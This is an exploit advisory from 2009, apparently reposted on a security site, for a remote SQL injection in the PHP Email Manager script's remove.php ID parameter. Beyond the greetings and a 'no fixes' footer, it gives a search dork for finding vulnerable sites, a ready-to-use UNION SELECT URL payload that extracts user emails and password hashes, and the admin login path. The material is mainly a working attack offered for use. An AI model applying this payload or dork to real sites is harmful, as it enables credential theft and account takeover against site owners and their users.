PHP Email Manager (remove.php ID) SQL Injection Vulnerability

2009-08-18 21:08:21

===========================================|->
~ Mtrb3 hena [Security-Code] ~
===========================================|->

script :-> PHP Email Manager < Remote SQL Injection Vulnerability >

Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html

Dork:->PHPEmailManager

Found by :-> [ MuShTaQ ]

from :-> [WwW.SeC-CoDe.com]

C0ntact :[email protected]

===========================================|->
~ Exploit ~
===========================================|->

File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]

Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--

Admin Login:-> http//www.site.com/PHPEmailManager/login.php


-:::::::::::::::::: GreeetZ:::::::::::::::::-

Sniper.vb , Mr.Nrfzh,and all friends

Bay Bay

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.